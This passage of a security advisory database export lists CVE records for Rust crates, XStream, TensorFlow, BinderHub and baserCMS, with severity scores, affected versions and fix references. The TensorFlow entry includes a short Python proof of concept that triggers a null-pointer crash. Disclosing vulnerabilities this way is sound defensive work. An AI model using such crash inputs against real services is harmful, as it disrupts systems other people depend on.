'2021-08-19T21:23:28Z', 'nvd_published_at': None}" +1.4.0,GHSA-wxjf-9f4g-3v44,2021-08-24T18:02:25Z,2021-08-25T20:56:05Z,,['CVE-2020-36461'],Data races in noise_search,"Affected versions of the `noise_search` crate unconditionally implement Send/Sync for `MvccRwLock`. +This can lead to data races when types that are either `!Send` or `!Sync` (e.g. `Rc`, `Arc>`) are contained inside `MvccRwLock` and sent across thread boundaries. The data races can potentially lead to memory corruption (as demonstrated in the PoC from the original report issue). + +Also, safe APIs of `MvccRwLock` allow aliasing violations by allowing `&T` and `LockResult>>` to co-exist in conflicting lifetime regions. The APIs of `MvccRwLock` should either be marked as `unsafe` or `MbccRwLock` should be changed to private or pub(crate). +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'noise_search'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36461'}, {'type': 'WEB', 'url': 'https://github.com/pipedown/noise/issues/72'}, {'type': 'PACKAGE', 'url': 'https://github.com/pipedown/noise'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0141.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:19:50Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-mxv6-q98x-h958,2021-08-24T18:00:46Z,2021-08-25T20:56:07Z,,['CVE-2020-36460'],Data races in model,"`Shared` data structure in `model` crate implements `Send` and `Sync` traits regardless of the inner type. +This allows safe Rust code to trigger a data race, which is undefined behavior in Rust. + +Users are advised to treat `Shared` as an unsafe type. +It should not be used outside of the testing context, +and care must be taken so that the testing code does not have a data race +besides a race condition that is expected to be caught by the test. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'model'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36460'}, {'type': 'WEB', 'url': 'https://github.com/spacejam/model/issues/3'}, {'type': 'PACKAGE', 'url': 'https://github.com/spacejam/model'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0140.html'}]","{'cwe_ids': ['CWE-362', 'CWE-843'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:17:33Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-jrf8-cmgg-gv2m,2023-06-13T20:29:54Z,2021-08-25T20:53:07Z,,['CVE-2021-26307'],Error on unsupported architectures in raw-cpuid,"native_cpuid::cpuid_count() exposes the unsafe __cpuid_count() intrinsic from core::arch::x86 or core::arch::x86_64 as a safe function, and uses it internally, without checking the safety requirement: + +* The CPU the program is currently running on supports the function being called. + +CPUID is available in most, but not all, x86/x86_64 environments. The crate compiles only on these architectures, so others are unaffected. This issue is mitigated by the fact that affected programs are expected to crash deterministically every time. + +The flaw has been fixed in v9.0.0, by intentionally breaking compilation when targeting SGX or 32-bit x86 without SSE. This covers all affected CPUs.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'raw-cpuid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26307'}, {'type': 'WEB', 'url': 'https://github.com/gz/rust-cpuid/issues/40'}, {'type': 'WEB', 'url': 'https://github.com/gz/rust-cpuid/issues/41'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/pull/614'}, {'type': 'WEB', 'url': 'https://github.com/gz/rust-cpuid/commit/91b676eecd01f2163e2984215e2c0ac89e30ce75'}, {'type': 'PACKAGE', 'url': 'https://github.com/gz/rust-cpuid'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0013.html'}]","{'cwe_ids': ['CWE-400', 'CWE-657'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:02:32Z', 'nvd_published_at': '2021-01-29T03:15:00Z'}" +1.4.0,GHSA-8q64-wrfr-q48c,2021-08-24T17:59:47Z,2021-08-25T20:59:24Z,2021-08-24T17:59:47Z,[],Data races in model,"`Shared` data structure in `model` crate implements `Send` and `Sync` traits regardless of the inner type. +This allows safe Rust code to trigger a data race, which is undefined behavior in Rust. + +Users are advised to treat `Shared` as an unsafe type. +It should not be used outside of the testing context, +and care must be taken so that the testing code does not have a data race +besides a race condition that is expected to be caught by the test. + +Check [the Rustonomicon](https://doc.rust-lang.org/nomicon/races.html) for the difference between +a data race and a general race condition. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'model'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/spacejam/model/issues/3'}, {'type': 'PACKAGE', 'url': 'https://github.com/spacejam/model'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0140.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T17:22:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-9658-c26v-7qvf,2021-08-19T16:50:37Z,2021-08-25T20:55:30Z,,['CVE-2021-27377'],Use-after-free in yottadb,"An issue was discovered in the yottadb crate before 1.2.0 for Rust. For some memory-allocation patterns, ydb_subscript_next_st and ydb_subscript_prev_st have a use-after-free.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'yottadb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27377'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/YottaDB/Lang/YDBRust'}, {'type': 'WEB', 'url': 'https://gitlab.com/YottaDB/Lang/YDBRust/-/issues/40'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0022.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T16:50:37Z', 'nvd_published_at': None}" +1.4.0,GHSA-rm4w-6696-r77p,2023-06-13T18:30:56Z,2021-08-25T20:52:14Z,,['CVE-2021-27376'],nb-connect invalidly assumes the memory layout of std::net::SocketAddr,"The nb-connect crate has assumed std::net::SocketAddrV4 and std::net::SocketAddrV6 have the same memory layout as the system C representation sockaddr. It has simply casted the pointers to convert the socket addresses to the system representation. The standard library does not say anything about the memory layout, and this will cause invalid memory access if the standard library changes the implementation. No warnings or errors will be emitted once the change happens.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'nb-connect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27376'}, {'type': 'WEB', 'url': 'https://github.com/smol-rs/nb-connect/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/smol-rs/nb-connect'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0021.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:34:37Z', 'nvd_published_at': None}" +1.4.0,GHSA-2q8x-2p7f-574v,2022-02-08T20:43:56Z,2021-08-25T14:46:49Z,,['CVE-2021-39153'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39153](https://x-stream.github.io/CVE-2021-39153.html). + +### Credits +Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-2q8x-2p7f-574v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39153'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39153.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:32Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-c5x2-p679-95wc,2021-08-23T19:27:50Z,2021-08-25T14:43:32Z,,['CVE-2021-37647'],Null pointer dereference in `SparseTensorSliceDataset`,"### Impact +When a user does not supply arguments that determine a valid sparse tensor, `tf.raw_ops.SparseTensorSliceDataset` implementation can be made to dereference a null pointer: + +```python +import tensorflow as tf + +tf.raw_ops.SparseTensorSliceDataset( + indices=[[],[],[]], + values=[1,2,3], + dense_shape=[3,3]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/data/sparse_tensor_slice_dataset_op.cc#L240-L251) has some argument validation but fails to consider the case when either `indices` or `values` are provided for an empty sparse tensor when the other is not. + +If `indices` is empty (as in the example above), then [code that performs validation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/data/sparse_tensor_slice_dataset_op.cc#L260-L261) (i.e., checking that the indices are monotonically increasing) results in a null pointer dereference: + +```cc + for (int64_t i = 0; i < indices->dim_size(0); ++i) { + int64_t next_batch_index = indices->matrix()(i, 0); + ... + } +``` + +If `indices` as provided by the user is empty, then `indices` in the C++ code above is backed by an empty `std::vector`, hence calling `indices->dim_size(0)` results in null pointer dereferencing (same as calling `std::vector::at()` on an empty vector). + +### Patches +We have patched the issue in GitHub commit [02cc160e29d20631de3859c6653184e3f876b9d7](https://github.com/tensorflow/tensorflow/commit/02cc160e29d20631de3859c6653184e3f876b9d7). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c5x2-p679-95wc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37647'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/02cc160e29d20631de3859c6653184e3f876b9d7'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T19:27:50Z', 'nvd_published_at': '2021-08-12T19:15:00Z'}" +1.4.0,GHSA-hgjr-632x-qpp3,2021-08-26T15:08:57Z,2021-08-30T16:18:59Z,,['CVE-2021-39136'],Cross-site scripting vulnerability in file upload,"There is a cross-site scripting vulnerability in file upload on the management system of baserCMS. + +This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. +If you are eligible, please update to the new version as soon as possible. + +### Target +baserCMS 4.5.1 and earlier versions + +### Vulnerability +Execution of malicious JavaScript code may alter the display of the page or leak cookie information. + +### Countermeasures +Update to the latest version of baserCMS + +Please refer to the next page for details. +https://basercms.net/security/JVN_14134801","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.5.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39136'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc'}, {'type': 'WEB', 'url': 'https://basercms.net/security/JVN_14134801'}, {'type': 'PACKAGE', 'url': 'https://github.com/baserproject/basercms'}, {'type': 'WEB', 'url': 'http://jvn.jp/en/jp/JVN14134801/index.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T15:08:57Z', 'nvd_published_at': '2021-08-25T18:15:00Z'}" +1.4.0,GHSA-3jc5-5hc5-33gj,2023-06-13T17:00:10Z,2021-08-25T20:50:49Z,,['CVE-2020-36208'],Data races in conquer-once,"Affected versions of conquer-once implements Sync for its OnceCell type without restricting it to Sendable types. + +This allows non-Send but Sync types such as MutexGuard to be sent across threads leading to undefined behavior and memory corruption in concurrent programs. + +The issue was fixed by adding a Send constraint to OnceCell.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'conquer-once'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36208'}, {'type': 'WEB', 'url': 'https://github.com/oliver-giersch/conquer-once/issues/3'}, {'type': 'PACKAGE', 'url': 'https://github.com/oliver-giersch/conquer-once'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0101.html'}]","{'cwe_ids': ['CWE-662', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:51:18Z', 'nvd_published_at': None}" +1.4.0,GHSA-hvqc-pc78-x9wh,2023-06-13T20:30:27Z,2021-08-25T20:53:10Z,,['CVE-2021-26306'],Soundness issue in raw-cpuid,"VendorInfo::as_string(), SoCVendorBrand::as_string(), and ExtendedFunctionInfo::processor_brand_string() construct byte slices using std::slice::from_raw_parts(), with data coming from #[repr(Rust)] structs. This is always undefined behavior. +This flaw has been fixed in v9.0.0, by making the relevant structs #[repr(C)].","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'raw-cpuid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26306'}, {'type': 'WEB', 'url': 'https://github.com/gz/rust-cpuid/issues/40'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/pull/614'}, {'type': 'PACKAGE', 'url': 'https://github.com/gz/rust-cpuid'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0013.html'}]","{'cwe_ids': ['CWE-198', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:02:19Z', 'nvd_published_at': '2021-01-29T03:15:00Z'}" +1.4.0,GHSA-9jjr-qqfp-ppwx,2021-08-26T14:47:49Z,2021-08-30T16:16:58Z,,['CVE-2021-39159'],remote code execution via git repo provider,"### Impact + +A remote code execution vulnerability has been identified in BinderHub, where providing BinderHub with maliciously crafted input could execute code in the BinderHub context, with the potential to egress credentials of the BinderHub deployment, including JupyterHub API tokens, kubernetes service accounts, and docker registry credentials. This may provide the ability to manipulate images and other user created pods in the deployment, with the potential to escalate to the host depending on the underlying kubernetes configuration. + +### Patches + +Patch below, or [on GitHub](https://github.com/jupyterhub/binderhub/commit/195caac172690456dcdc8cc7a6ca50e05abf8182.patch) + +```diff +From 9f4043d9dddc1174920e687773f27b7933f48ab6 Mon Sep 17 00:00:00 2001 +From: Riccardo Castellotti +Date: Thu, 19 Aug 2021 15:49:43 +0200 +Subject: [PATCH] Explicitly separate git-ls-remote options from positional + arguments + +--- + binderhub/repoproviders.py | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/binderhub/repoproviders.py b/binderhub/repoproviders.py +index f33347b..5d4b87c 100755 +--- a/binderhub/repoproviders.py ++++ b/binderhub/repoproviders.py +@@ -484,7 +484,7 @@ class GitRepoProvider(RepoProvider): + self.sha1_validate(self.unresolved_ref) + except ValueError: + # The ref is a head/tag and we resolve it using `git ls-remote` +- command = [""git"", ""ls-remote"", self.repo, self.unresolved_ref] ++ command = [""git"", ""ls-remote"", ""--"", self.repo, self.unresolved_ref] + result = subprocess.run(command, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + if result.returncode: + raise RuntimeError(""Unable to run git ls-remote to get the `resolved_ref`: {}"".format(result.stderr)) +-- +2.25.1 + +``` + +### Workarounds + +Disable the git repo provider by specifying the `BinderHub.repo_providers` config, e.g.: + +```python +from binderhub.repoproviders import (GitHubRepoProvider, + GitLabRepoProvider, GistRepoProvider, + ZenodoProvider, FigshareProvider, HydroshareProvider, + DataverseProvider) + +c.BinderHub.repo_providers = { + 'gh': GitHubRepoProvider, + 'gist': GistRepoProvider, + 'gl': GitLabRepoProvider, + 'zenodo': ZenodoProvider, + 'figshare': FigshareProvider, + 'hydroshare': HydroshareProvider, + 'dataverse': DataverseProvider, + } +``` + +### References + +Credit: Jose Carlos Luna Duran (CERN) and Riccardo Castellotti (CERN). + +### For more information + +If you have any questions or comments about this advisory: + +* Email us at [security@ipython.org](mailto:security@ipython.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'binderhub'}, 'ecosystem_specific': {'affected_functions': ['binderhub.repoproviders.GitRepoProvider.get_resolved_ref']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyterhub/binderhub/security/advisories/GHSA-9jjr-qqfp-ppwx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39159'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/binderhub/commit/195caac172690456dcdc8cc7a6ca50e05abf8182'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/binderhub/commit/195caac172690456dcdc8cc7a6ca50e05abf8182.patch'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyterhub/binderhub'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T15:20:56Z', 'nvd_published_at': '2021-08-25T19:15:00Z'}" +1.4.0,GHSA-fg42-vwxx-xx5j,2023-06-13T22:05:30Z,2021-08-25T20:58:53Z,,['CVE-2020-36438'],Data race in tiny_future,tiny_future contains a light-weight implementation of Futures. The Future type it has lacked bound on its Send and Sync traits. This allows for a bug where non-thread safe types such as Cell can be used in Futures and cause data races in concurrent programs. The flaw was corrected in commit `c791919` by adding trait bounds to Future's Send and Sync.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tiny_future'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36438'}, {'type': 'WEB', 'url': 'https://github.com/KizzyCode/tiny_future/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/KizzyCode/tiny_future-rust/commit/c7919199a0f6d1ce0e3c33499d1b37f862c990e4'}, {'type': 'PACKAGE', 'url': 'https://github.com/KizzyCode/tiny_future'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/tiny_future/RUSTSEC-2020-0118.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0118.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T22:41:30Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-wp34-mqw5-jj85,2023-06-13T20:02:46Z,2021-08-25T20:52:00Z,,['CVE-2021-28032'],Use after free in nano_arena,"Affected versions of this crate assumed that Borrow was guaranteed to return the same value on .borrow(). The borrowed index value was used to retrieve a mutable reference to a value. + +If the Borrow implementation returned a different index, the split arena would allow retrieving the index as a mutable reference creating two mutable references to the same element. This violates Rust's aliasing rules and allows for memory safety issues such as writing out of bounds and use-after-frees. + +The flaw was corrected in commit `6b83f9d` by storing the .borrow() value in a temporary variable.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'nano_arena'}, 'ecosystem_specific': {'affected_functions': ['nano_arena::Arena::split_at', 'nano_arena::ArenaSplit::split_at']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28032'}, {'type': 'WEB', 'url': 'https://github.com/bennetthardwick/nano-arena/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/bennetthardwick/nano-arena/commit/6b83f9d0708337a9f8b709c1624a8587021ceba2'}, {'type': 'PACKAGE', 'url': 'https://github.com/bennetthardwick/nano-arena'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0031.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:23:52Z', 'nvd_published_at': None}" +1.4.0,GHSA-v5m7-53cv-f3hx,2022-08-10T23:46:00Z,2021-08-25T21:01:13Z,,['CVE-2020-15254'],crossbeam-channel Undefined Behavior before v0.4.4,"### Impact + +The affected version of this crate's the `bounded` channel incorrectly assumes that `Vec::from_iter` has allocated capacity that same as the number of iterator elements. `Vec::from_iter` does not actually guarantee that and may allocate extra memory. The destructor of the `bounded` channel reconstructs `Vec` from the raw pointer based on the incorrect assumes described above. This is unsound and causing deallocation with the incorrect capacity when `Vec::from_iter` has allocated different sizes with the number of iterator elements. + +### Patches + +This has been fixed in crossbeam-channel 0.4.4. + +We recommend users to upgrade to 0.4.4. + +### References + +See https://github.com/crossbeam-rs/crossbeam/pull/533, https://github.com/crossbeam-rs/crossbeam/issues/539, and https://github.com/RustSec/advisory-db/pull/425 for more details. + +### License + +This advisory is in the public domain.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'crossbeam-channel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.3'}, {'fixed': '0.4.4'}]}], 'versions': ['0.4.3']}]","[{'type': 'WEB', 'url': 'https://github.com/crossbeam-rs/crossbeam/security/advisories/GHSA-v5m7-53cv-f3hx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15254'}, {'type': 'WEB', 'url': 'https://github.com/crossbeam-rs/crossbeam/issues/539'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/pull/425'}, {'type': 'WEB', 'url': 'https://github.com/crossbeam-rs/crossbeam/pull/533'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossbeam-rs/crossbeam'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0052.html'}]","{'cwe_ids': ['CWE-119', 'CWE-401'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-03T22:53:34Z', 'nvd_published_at': '2020-10-16T17:15:00Z'}" +1.4.0,GHSA-m833-jv95-mfjh,2021-08-19T20:56:31Z,2021-08-25T20:48:50Z,,['CVE-2020-35889'],Memory safety violation in crayon,An issue was discovered in the crayon crate through 2020-08-31 for Rust. A TOCTOU issue has a resultant memory safety violation via HandleLike.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'crayon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35889'}, {'type': 'WEB', 'url': 'https://github.com/shawnscode/crayon/issues/87'}, {'type': 'PACKAGE', 